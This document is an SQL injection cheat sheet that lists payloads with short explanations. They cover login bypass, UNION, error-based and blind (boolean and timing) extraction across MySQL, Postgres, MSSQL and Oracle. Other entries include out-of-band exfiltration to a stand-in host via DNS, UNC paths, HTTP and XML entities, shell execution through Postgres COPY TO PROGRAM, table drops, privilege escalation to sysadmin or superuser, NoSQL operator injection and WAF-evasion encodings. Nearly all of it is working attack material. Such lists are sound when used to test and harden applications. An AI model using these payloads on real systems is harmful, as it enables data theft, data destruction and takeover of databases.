SQL Injection Cheat Sheet

admin'--

Closes the username literal and uses the SQL line comment to drop the trailing password check, so the WHERE clause matches on username alone. On MySQL the dash-dash needs a trailing space or a # comment.

' OR 1=1--

Closes the literal string and injects a predicate that is always true, widening the WHERE clause to every row, then comments out the rest of the original query so it still parses.

' ORDER BY 1-- ' ORDER BY 2-- ...

Increments the ORDER BY ordinal until the response errors or changes, revealing the column count of the original SELECT — a precondition for a working UNION SELECT.

' UNION SELECT NULL, @@version, NULL--

Pads the appended row with NULLs to match the original column types, then swaps one NULL for a string-typed value. The first printable column reveals which slot can carry exfiltrated data.

' AND 1=CAST((SELECT current_user) AS int)--

Postgres cannot cast a non-numeric string to int and includes the offending value in the error text, leaking the subquery result via the error channel even when no UNION column is printable.

' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version())))--

Feeds an invalid XPath expression containing the subquery result; MySQL surfaces the offending input verbatim in the error message, leaking the version string without needing a UNION.

' AND 1=CONVERT(int,(SELECT @@version))--

Forces MSSQL to convert the version string to int; the engine raises a 'Conversion failed' error that includes the original string, leaking it through the error channel.

' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--

Calls Oracle's DRITHSX.SN function with a non-text first argument so the error reflects the second-argument subquery, leaking version banner data without UNION support.

' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--

Tests one character of a target string at a time; if the predicate is true the page renders the original content, if false it differs. Iterating with binary search via < / > halves request count.

' OR username LIKE 'admin'--

Uses LIKE in place of = so payloads land even when the application or WAF strips the equals sign; semantics are identical for non-wildcard literals.

' OR username IN ('admin')--

Replaces the equality check with set membership; lets the predicate survive WAFs that allow-list operators by removing = from the input.

' OR username BETWEEN 'admin' AND 'admin'--

Encodes equality as a degenerate range; still WAF-bypass useful when both = and IN are blocked. The two-bound form keeps semantics identical to a strict equality check.

' AND 'a' RLIKE 'a'--

Uses RLIKE / regex match as a boolean true generator; useful when string literals trigger heuristic blocks but regex operators slip through.

' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

IF() returns a 5-second delay only when the predicate is true; the RTT difference becomes the side channel. Median three trials to filter network jitter.

'; SELECT CASE WHEN (SUBSTRING(current_database(),1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END--

CASE evaluates one of two pg_sleep calls; the timing of the response leaks the boolean result. Stacked-query terminator is required because Postgres allows multiple statements.

'; IF (SUBSTRING(DB_NAME(),1,1)='a') WAITFOR DELAY '0:0:5'--

MSSQL only delays when the IF predicate is true; the engine's WAITFOR primitive is the canonical timing oracle for time-based blind on SQL Server.

' AND 1=(CASE WHEN (SUBSTR(user,1,1)='S') THEN dbms_pipe.receive_message(('a'),5) ELSE 1 END)--

dbms_pipe.receive_message blocks for the requested seconds when the named pipe is empty, giving Oracle a time-based oracle without a true sleep function.

'; SELECT CASE WHEN (1=1) THEN (SELECT count(*) FROM generate_series(1,10000000)) ELSE 1 END--

When pg_sleep is revoked, generate_series with a large bound burns CPU long enough to be observable as a timing delta — useful against hardened roles.

' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT user()),'.x.oast.example\\a'))--

On Windows MySQL with file privilege, LOAD_FILE on a UNC path triggers a DNS lookup whose hostname carries the exfiltrated value; the Collaborator host records the encoded data.

COPY (SELECT '') TO PROGRAM 'nslookup `whoami`.x.oast.example';

Postgres COPY ... TO PROGRAM shells out to nslookup, embedding the result of `whoami` (or any subquery) in the DNS request. Requires the role to hold the pg_execute_server_program grant.

'; EXEC master..xp_dirtree '\\\\x.oast.example\\a'--

xp_dirtree resolves a UNC path before listing it, generating SMB and DNS lookups that an attacker-controlled responder logs — the canonical MSSQL OAST primitive when xp_cmdshell is disabled.

' UNION SELECT UTL_HTTP.request('http://'||(SELECT user FROM dual)||'.x.oast.example/') FROM dual--

UTL_HTTP makes an outbound HTTP call whose hostname carries the subquery result; works in Oracle versions where the package ACL still permits external resolution.

SELECT EXTRACTVALUE(xmltype('<!DOCTYPE r [<!ENTITY % p SYSTEM "http://'||(SELECT user FROM dual)||'.x.oast.example/">%p;]>'),'/l') FROM dual;

Builds an XML doc with an external entity whose system identifier carries the leaked value; Oracle resolves the entity over HTTP, exfiltrating data even when UTL_HTTP is restricted.

'; DROP TABLE audit_log--

The semicolon terminates the original statement and starts a new one in the same call; works with mysqli_multi_query, Postgres and MSSQL drivers, but Oracle does not support stacked statements.

robert'); DROP TABLE students;--

Stored verbatim by the input page (often as a username) then concatenated into a query on a later admin/report path — the canonical Bobby-Tables shape. The first-write path can look benign while the second-read path is exploitable.

' UNION SELECT '<inner_payload>' INTO @x; PREPARE s FROM @x; EXECUTE s--

Injection point feeds another query that becomes the actually-executing statement; the primary input controls a value used to build a downstream query. Useful when the first sink only echoes status, not data.

'; EXEC sp_addsrvrolemember 'app_user','sysadmin'--

Once a stacked statement lands, escalates the application's database role to sysadmin if the current login holds the necessary grants — common on misconfigured legacy estates.

'; ALTER USER app_user WITH SUPERUSER--

Stacked ALTER USER promotes the application role to SUPERUSER when the connection is already a privileged role; demonstrates why least-privilege at the DB layer is non-negotiable.

{"username":"admin","password":{"$ne":null}}

Replaces the password value with a $ne operator that matches any non-null stored hash; the application logic treats a found document as a valid login. Classic NoSQL operator injection.

'; return true; //

Inside a $where clause Mongo evaluates the string as JavaScript; closing the literal and returning true makes every document match. sleep() inside $where also gives a time-based oracle.

col = #{user_input}

Hibernate HQL, ActiveRecord raw .where, SQLAlchemy text(), Sequelize.literal and knex.raw all interpolate strings without parameterising. WSTG-INPV-05.7 lists every ORM's back-door API.

'/**/OR/**/'{"a":1}'::jsonb @> '{"a":1}'::jsonb--

Team82's primitive: rewrites OR 1=1 using JSON containment so legacy WAF signatures looking for arithmetic equality miss it entirely. Still landed against unpatched stacks in 2025.

'/**/OR/**/JSON_EXTRACT('{"a":1}','$.a')=1--

Same Team82 family on MySQL: JSON_EXTRACT returns a numeric 1, satisfying the equality without any classic 1=1 / OR-true literal that signature-based WAFs fingerprint.

SELECT/**/password/**/FROM/**/users

Substitutes empty C-style comments for literal spaces; MySQL and Postgres tokenisers ignore them, while regex-based WAFs that anchor on \s+ between keywords miss the match.

SELECT(password)FROM(users)

Removes whitespace by relying on parentheses as token boundaries; valid SQL on most engines and rarely fingerprinted because most WAF rules assume keywords are space-separated.

SELECT%0apassword%0aFROM%0ausers

Encodes whitespace as %0A; many WAFs decode once but normalise differently from the database driver, so the bypass survives one decode pass while still parsing correctly server-side.

%27%20OR%201%3d1--

URL-encodes the single quote, the space and the equals; covered by the 2025 academic mutation strategies that extend the standard 13 obfuscations and beat naive signature WAFs.

\xa1' OR 1=1--

Under BIG5 client + EUC_TW server encodings, PQescapeLiteral and PQescapeString fail to neutralise the quote; psql callers that built command-lines from these were exploitable. Patched in libpq 17.3 / 16.7 / 15.11 / 14.16 / 13.19.